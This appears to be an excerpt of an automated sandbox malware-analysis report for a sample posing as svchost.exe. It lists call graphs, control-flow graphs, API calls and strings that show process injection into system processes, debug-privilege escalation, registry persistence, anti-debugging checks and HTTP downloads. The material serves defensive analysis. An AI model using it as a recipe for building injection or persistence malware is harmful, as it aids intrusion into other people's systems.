VirtualFree 1290->1291 1292 7ff7e52b3b48 1290->1292 1291->1292 1292->1132 1323 7ff7e52b3744 GetWindowsDirectoryW 1293->1323 1295 7ff7e52b38f3 8 API calls 1295->1152 1297 7ff7e52b4745 GetFileSize GetProcessHeap RtlAllocateHeap 1296->1297 1298 7ff7e52b473e 1296->1298 1299 7ff7e52b47a0 ReadFile 1297->1299 1300 7ff7e52b478e CloseHandle 1297->1300 1298->1155 1301 7ff7e52b47ef 1299->1301 1302 7ff7e52b47c7 GetProcessHeap HeapFree CloseHandle 1299->1302 1300->1298 1303 7ff7e52b4808 GetProcessHeap HeapFree CloseHandle 1301->1303 1306 7ff7e52b4830 1301->1306 1302->1298 1303->1298 1304 7ff7e52b499b GetProcessHeap RtlFreeHeap CloseHandle 1304->1298 1305 7ff7e52b48eb GetProcessHeap RtlAllocateHeap 1307 7ff7e52b4934 1305->1307 1306->1304 1306->1305 1307->1304 1328 7ff7e52b4004 CreateToolhelp32Snapshot 1308->1328 1311 7ff7e52b40e4 1312 7ff7e52b414b GetCurrentProcess OpenProcessToken 1311->1312 1313 7ff7e52b41c2 OpenProcess 1312->1313 1314 7ff7e52b4168 LookupPrivilegeValueW 1312->1314 1320 7ff7e52b41ee 1313->1320 1322 7ff7e52b41e4 1313->1322 1315 7ff7e52b4190 AdjustTokenPrivileges 1314->1315 1316 7ff7e52b41b7 CloseHandle 1314->1316 1315->1316 1316->1313 1318 7ff7e52b424f 1318->1154 1319 7ff7e52b4244 CloseHandle 1319->1318 1321 7ff7e52b4222 WaitForSingleObject 1320->1321 1320->1322 1335 7ff7e52b2cb8 1320->1335 1321->1312 1321->1322 1322->1318 1322->1319 1324 7ff7e52b3798 GetVolumeInformationW 1323->1324 1325 7ff7e52b378e 1323->1325 1326 7ff7e52b3814 1324->1326 1325->1324 1327 7ff7e52b387e wsprintfW 1326->1327 1327->1295 1329 7ff7e52b403f Process32FirstW 1328->1329 1330 7ff7e52b3342 1328->1330 1331 7ff7e52b4099 CloseHandle 1329->1331 1332 7ff7e52b405e wcscmp 1329->1332 1330->1311 1331->1330 1333 7ff7e52b4082 Process32NextW 1332->1333 1334 7ff7e52b4075 1332->1334 1333->1331 1333->1332 1334->1331 1336 7ff7e52b2d0b 1335->1336 1338 7ff7e52b2d4d VirtualAllocEx 1336->1338 1341 7ff7e52b2d2b 1336->1341 1343 7ff7e52b2a88 1336->1343 1339 7ff7e52b2d87 WriteProcessMemory 1338->1339 1338->1341 1340 7ff7e52b2dd0 VirtualProtectEx 1339->1340 1339->1341 1340->1341 1342 7ff7e52b2e03 CreateRemoteThread 1340->1342 1341->1320 1342->1336 1342->1341 1344 7ff7e52b2b01 1343->1344 1345 7ff7e52b2c0a StrStrA 1344->1345 1346 7ff7e52b2b08 1344->1346 1345->1344 1345->1346 1346->1336 1348 7ff7e52b450a 1347->1348 1349 7ff7e52b452b GetLastError 1347->1349 1353 7ff7e52b4404 GetFileSize 1348->1353 1350 7ff7e52b329f CreateThread Sleep 1349->1350 1350->870 1358 7ff7e52b3b54 VirtualAlloc 1353->1358 1355 7ff7e52b447a CloseHandle 1355->1350 1356 7ff7e52b4430 1356->1355 1357 7ff7e52b4444 SetFilePointer ReadFile 1356->1357 1357->1355 1358->1356 1360 7ff7e52b39f5 1359->1360 1361 7ff7e52b39f9 RegSetValueExW RegCloseKey 1359->1361 1360->1169 1361->1360 1414 7ff7e52b2f9c 1415 7ff7e52b38c4 11 API calls 1414->1415 1416 7ff7e52b2fdb 1415->1416 1417 7ff7e52b46e4 17 API calls 1416->1417 1418 7ff7e52b2fff 1417->1418 1419 7ff7e52b40c4 5 API calls 1418->1419 1420 7ff7e52b3022 1419->1420 1421 7ff7e52b40e4 13 API calls 1420->1421 1422 7ff7e52b3037 GetProcessHeap HeapFree 1421->1422 1448 7ff7e52b1cdc 1449 7ff7e52b1d06 InternetOpenW 1448->1449 1450 7ff7e52b1d40 InternetOpenUrlW 1449->1450 1451 7ff7e52b1d33 Sleep 1449->1451 1452 7ff7e52b1dc9 HttpQueryInfoA 1450->1452 1453 7ff7e52b1d77 InternetOpenUrlW 1450->1453 1451->1449 1455 7ff7e52b1df8 InternetCloseHandle InternetCloseHandle Sleep 1452->1455 1456 7ff7e52b1e1e 1452->1456 1453->1452 1454 7ff7e52b1dae InternetCloseHandle Sleep 1453->1454 1454->1449 1455->1449 1457 7ff7e52b1e85 HttpQueryInfoA GetProcessHeap RtlAllocateHeap 1456->1457 1458 7ff7e52b1e28 InternetCloseHandle InternetOpenUrlW 1456->1458 1460 7ff7e52b1eea InternetCloseHandle InternetCloseHandle 1457->1460 1463 7ff7e52b1f04 1457->1463 1458->1457 1459 7ff7e52b1e6a InternetCloseHandle Sleep 1458->1459 1459->1449 1461 7ff7e52b1f83 1460->1461 1462 7ff7e52b1f0c InternetReadFile 1462->1463 1464 7ff7e52b1f5a InternetCloseHandle InternetCloseHandle 1462->1464 1463->1462 1463->1464 1464->1461 1465 7ff7e52b30dc 1471 7ff7e52b30e5 1465->1471 1466 7ff7e52b31d1 1469 7ff7e52b3c24 RegDeleteKeyW 1469->1471 1470 7ff7e52b3e24 9 API calls 1470->1471 1471->1466 1471->1469 1471->1470 1472 7ff7e52b39b4 3 API calls 1471->1472 1474 7ff7e52b45c4 CreateFileW 1471->1474 1479 7ff7e52b3b84 RegOpenKeyExW 1471->1479 1473 7ff7e52b31c1 Sleep 1472->1473 1473->1471 1475 7ff7e52b461f 1474->1475 1476 7ff7e52b465a 1474->1476 1482 7ff7e52b4544 SetFilePointer WriteFile SetEndOfFile 1475->1482 1476->1471 1478 7ff7e52b463b SetFileAttributesW CloseHandle 1478->1476 1480 7ff7e52b3c12 1479->1480 1481 7ff7e52b3bd8 RegSetValueExW RegCloseKey 1479->1481 1480->1471 1481->1480 1482->1478

                                                                                                                                                                  Callgraph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  • Opacity -> Relevance
                                                                                                                                                                  • Disassembly available
                                                                                                                                                                  callgraph 0 Function_00007FF7E52BA052 1 Function_00007FF7E52B1050 2 Function_00007FF7E52BDC55 3 Function_00007FF7E52BCD54 4 Function_00007FF7E52B3B54 5 Function_00007FF7E52B2048 22 Function_00007FF7E52B1F88 5->22 52 Function_00007FF7E52B1FC8 5->52 82 Function_00007FF7E52B2008 5->82 6 Function_00007FF7E52BA04E 7 Function_00007FF7E52BD33F 8 Function_00007FF7E52BDC46 9 Function_00007FF7E52B3744 78 Function_00007FF7E52B3714 9->78 10 Function_00007FF7E52B4544 11 Function_00007FF7E52BD339 12 Function_00007FF7E52BF232 13 Function_00007FF7E52B3B24 14 Function_00007FF7E52B3C24 15 Function_00007FF7E52B3E24 16 Function_00007FF7E52BC91A 17 Function_00007FF7E52BD91D 18 Function_00007FF7E52B321C 19 Function_00007FF7E52BEF92 20 Function_00007FF7E52BA188 21 Function_00007FF7E52B2A88 29 Function_00007FF7E52B2978 21->29 23 Function_00007FF7E52B338C 23->5 24 Function_00007FF7E52BF281 25 Function_00007FF7E52BA27F 26 Function_00007FF7E52B3B84 27 Function_00007FF7E52BA778 28 Function_00007FF7E52BF278 30 Function_00007FF7E52B327C 58 Function_00007FF7E52B38C4 30->58 65 Function_00007FF7E52B44B4 30->65 31 Function_00007FF7E52BA772 32 Function_00007FF7E52BDE70 33 Function_00007FF7E52BA776 34 Function_00007FF7E52B3A74 34->9 34->58 64 Function_00007FF7E52B39B4 34->64 35 Function_00007FF7E52B4674 36 Function_00007FF7E52BC673 37 Function_00007FF7E52B2E6C 38 Function_00007FF7E52B306C 38->37 39 Function_00007FF7E52BA061 40 Function_00007FF7E52BD361 41 Function_00007FF7E52BB15F 42 Function_00007FF7E52BCF65 43 Function_00007FF7E52BD365 44 Function_00007FF7E52B4264 44->4 44->13 45 Function_00007FF7E52B3C64 46 Function_00007FF7E52BA05A 47 Function_00007FF7E52BDE59 48 Function_00007FF7E52BA258 49 Function_00007FF7E52BC65C 50 Function_00007FF7E52B345C 50->18 50->30 50->34 50->44 68 Function_00007FF7E52B10A0 50->68 69 Function_00007FF7E52B43A4 50->69 77 Function_00007FF7E52B3F14 50->77 100 Function_00007FF7E52B32EC 50->100 101 Function_00007FF7E52B33EC 50->101 106 Function_00007FF7E52B3CE4 50->106 51 Function_00007FF7E52BA2D0 53 Function_00007FF7E52B33CC 53->5 54 Function_00007FF7E52BC9CB 55 Function_00007FF7E52BDCC2 56 Function_00007FF7E52BDEC1 57 Function_00007FF7E52BD0C4 58->9 59 Function_00007FF7E52B40C4 87 Function_00007FF7E52B4004 59->87 60 Function_00007FF7E52B45C4 60->10 61 Function_00007FF7E52BD8B8 62 Function_00007FF7E52B2CB8 62->21 63 Function_00007FF7E52BEBBE 88 Function_00007FF7E52B4404 65->88 66 Function_00007FF7E52BBEAD 67 Function_00007FF7E52B33AC 67->5 68->1 85 Function_00007FF7E52B1000 68->85 70 Function_00007FF7E52BE999 71 Function_00007FF7E52BE997 72 Function_00007FF7E52B359D 73 Function_00007FF7E52B2F9C 73->45 73->58 73->59 104 Function_00007FF7E52B46E4 73->104 105 Function_00007FF7E52B40E4 73->105 74 Function_00007FF7E52BE99B 75 Function_00007FF7E52BD615 76 Function_00007FF7E52BD915 79 Function_00007FF7E52B3609 80 Function_00007FF7E52BB508 81 Function_00007FF7E52BE008 83 Function_00007FF7E52B2F0C 84 Function_00007FF7E52BC501 86 Function_00007FF7E52BD904 88->4 89 Function_00007FF7E52BABF9 90 Function_00007FF7E52BC2F9 91 Function_00007FF7E52BABF7 92 Function_00007FF7E52BC2F7 93 Function_00007FF7E52B36FC 94 Function_00007FF7E52BABFB 95 Function_00007FF7E52BABF2 96 Function_00007FF7E52BBCF1 97 Function_00007FF7E52BC2F5 98 Function_00007FF7E52BB2F4 99 Function_00007FF7E52BE8F3 100->45 100->58 100->59 100->104 100->105 102 Function_00007FF7E52B31EC 102->38 103 Function_00007FF7E52B36EC 104->35 105->62 107 Function_00007FF7E52BB3DA 108 Function_00007FF7E52BEFD8 109 Function_00007FF7E52BA0DD 110 Function_00007FF7E52B1CDC 111 Function_00007FF7E52B30DC 111->14 111->15 111->26 111->60 111->64

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 231 7ff7e52b345c-7ff7e52b3472 call 7ff7e52b10a0 call 7ff7e52b321c 236 7ff7e52b3474-7ff7e52b3476 ExitProcess 231->236 237 7ff7e52b347c-7ff7e52b34aa call 7ff7e52b4264 call 7ff7e52b3ce4 call 7ff7e52b3f14 231->237 244 7ff7e52b34fb-7ff7e52b350e call 7ff7e52b3f14 237->244 245 7ff7e52b34ac-7ff7e52b34bd call 7ff7e52b43a4 237->245 250 7ff7e52b3510-7ff7e52b3521 call 7ff7e52b43a4 244->250 251 7ff7e52b354c-7ff7e52b355f call 7ff7e52b3f14 244->251 252 7ff7e52b34d2-7ff7e52b34d4 ExitProcess 245->252 253 7ff7e52b34bf-7ff7e52b34d0 call 7ff7e52b43a4 245->253 262 7ff7e52b3523-7ff7e52b3525 ExitProcess 250->262 263 7ff7e52b352b call 7ff7e52b327c 250->263 260 7ff7e52b3561-7ff7e52b3572 call 7ff7e52b43a4 251->260 261 7ff7e52b35a2-7ff7e52b35b8 call 7ff7e52b3a74 call 7ff7e52b33ec 251->261 253->252 264 7ff7e52b34da call 7ff7e52b32ec 253->264 273 7ff7e52b3574-7ff7e52b3576 ExitProcess 260->273 274 7ff7e52b357c call 7ff7e52b327c 260->274 283 7ff7e52b35ba-7ff7e52b35cb call 7ff7e52b43a4 261->283 284 7ff7e52b360e-7ff7e52b36d0 CreateThread * 3 WaitForSingleObject * 3 ExitProcess 261->284 270 7ff7e52b3530-7ff7e52b3535 263->270 272 7ff7e52b34df-7ff7e52b34e4 264->272 275 7ff7e52b3544-7ff7e52b3546 ExitProcess 270->275 276 7ff7e52b3537-7ff7e52b3542 Sleep 270->276 278 7ff7e52b34e6-7ff7e52b34f1 Sleep 272->278 279 7ff7e52b34f3-7ff7e52b34f5 ExitProcess 272->279 282 7ff7e52b3581-7ff7e52b3586 274->282 276->270 278->272 285 7ff7e52b3595-7ff7e52b3597 ExitProcess 282->285 286 7ff7e52b3588-7ff7e52b3593 Sleep 282->286 289 7ff7e52b35e0-7ff7e52b35e2 ExitProcess 283->289 290 7ff7e52b35cd-7ff7e52b35de call 7ff7e52b43a4 283->290 286->282 290->289 293 7ff7e52b35e8 call 7ff7e52b32ec 290->293 295 7ff7e52b35ed-7ff7e52b35f2 293->295 296 7ff7e52b3601-7ff7e52b3603 ExitProcess 295->296 297 7ff7e52b35f4-7ff7e52b35ff Sleep 295->297 297->295
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                  • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                  • API String ID: 613740775-1953711635
                                                                                                                                                                  • Opcode ID: 14c2fa25876479cd5c5c4ade1a135fd90693f5b51d36c120125410f70aa3ba6a
                                                                                                                                                                  • Instruction ID: 6a37a3d3dbbfe9a4201a1053f5dcbc6d8c39727c968cec8ce2592b0b5e5a105d
                                                                                                                                                                  • Opcode Fuzzy Hash: 14c2fa25876479cd5c5c4ade1a135fd90693f5b51d36c120125410f70aa3ba6a
                                                                                                                                                                  • Instruction Fuzzy Hash: 66610EA0A1CA5B81EBE4B731AC7537AA268AF9CF01FD44137D45EC61E1CE3DE5058232

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$CloseHandleOpenToken$AdjustCurrentLookupObjectPrivilegePrivilegesSingleValueWait
                                                                                                                                                                  • String ID: SeDebugPrivilege
                                                                                                                                                                  • API String ID: 2379135442-2896544425
                                                                                                                                                                  • Opcode ID: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
                                                                                                                                                                  • Instruction ID: f4f1afc37bda6ab2966feee90dab60963b9cafca664fda60ee59a040e09569d8
                                                                                                                                                                  • Opcode Fuzzy Hash: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
                                                                                                                                                                  • Instruction Fuzzy Hash: BD41B17291868586E790DB10F86431AF7A5FBC8B44F904136EA8983A98CF7DD448CF51

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 434396405-0
                                                                                                                                                                  • Opcode ID: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
                                                                                                                                                                  • Instruction ID: 7f8dff981f72ea310a778e564df07ac2d989e100c879d5eeba9dd70d8ccdef55
                                                                                                                                                                  • Opcode Fuzzy Hash: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
                                                                                                                                                                  • Instruction Fuzzy Hash: 14311C72A1C64586DB94DB15E8A072EF768FBC8B80F545136FA8E83B68DF3CD4418B11

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Virtual$AllocMemoryProcessProtectWrite
                                                                                                                                                                  • String ID: @
                                                                                                                                                                  • API String ID: 4073123320-2766056989
                                                                                                                                                                  • Opcode ID: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
                                                                                                                                                                  • Instruction ID: 8bd6eb75e1dd366afb0af4d1cc9c21161b6f15c8e3c874c67a4402ec841e8451
                                                                                                                                                                  • Opcode Fuzzy Hash: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
                                                                                                                                                                  • Instruction Fuzzy Hash: CE41E47260CB8986E7B0DB15E86436BB7A4F788B84F504126EACD83B58DF7DE4448B41

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileHeap$AllocateCloseCreateHandleProcessSize
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2693768547-0
                                                                                                                                                                  • Opcode ID: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
                                                                                                                                                                  • Instruction ID: b869d4c742584af1cf125b9547f8ae6701698a2acdf4f693115a0e6ca67554e8
                                                                                                                                                                  • Opcode Fuzzy Hash: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
                                                                                                                                                                  • Instruction Fuzzy Hash: A2812172A08B8582EB50DB55F89436AF7A5FBC9B90F504136EA8D87B68DF3CD044CB11

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF7E52B3744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF7E52B3784
                                                                                                                                                                    • Part of subcall function 00007FF7E52B3744: GetVolumeInformationW.KERNELBASE ref: 00007FF7E52B3801
                                                                                                                                                                    • Part of subcall function 00007FF7E52B3744: wsprintfW.USER32 ref: 00007FF7E52B38A2
                                                                                                                                                                  • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B390D
                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3922
                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3935
                                                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3945
                                                                                                                                                                  • SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3958
                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B396D
                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3980
                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3995
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                  • String ID: .exe
                                                                                                                                                                  • API String ID: 1846285901-4119554291
                                                                                                                                                                  • Opcode ID: ad427c8d5848fc1249d0a57c1c2e5cab76719b9f7eb05ae4e82a907526b46e72
                                                                                                                                                                  • Instruction ID: 39e499edb2183f20f55127a5609ddfabdb163c6d6e592bf69cfb54d3bbb0af6a
                                                                                                                                                                  • Opcode Fuzzy Hash: ad427c8d5848fc1249d0a57c1c2e5cab76719b9f7eb05ae4e82a907526b46e72
                                                                                                                                                                  • Instruction Fuzzy Hash: AC11516162898A81DFA4AF25FC6436AA365FBC8F80F845033DA4E87A28DE3CD104C711

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2850635065-0
                                                                                                                                                                  • Opcode ID: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                  • Instruction ID: e8a55d8741fd77ba7457c4708f840c4cebe50378b922e222d86fb7c7cd482f0a
                                                                                                                                                                  • Opcode Fuzzy Hash: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                  • Instruction Fuzzy Hash: 561137B190C68981EBB4AB10E89836AB365FB98B54F404736C69D82698DF3DD504CB51

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                  • String ID: %08lX%04lX%lu
                                                                                                                                                                  • API String ID: 3001812590-640692576
                                                                                                                                                                  • Opcode ID: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
                                                                                                                                                                  • Instruction ID: a4f14c1172be88d4579fd17a668df9162e9b1aba96832658460c891d6d0af302
                                                                                                                                                                  • Opcode Fuzzy Hash: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
                                                                                                                                                                  • Instruction Fuzzy Hash: 97311A6661C5C5C6DB70DB64E8983AAB3A4FB98B00F904136E68DC3A58DB3DD548CB11

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
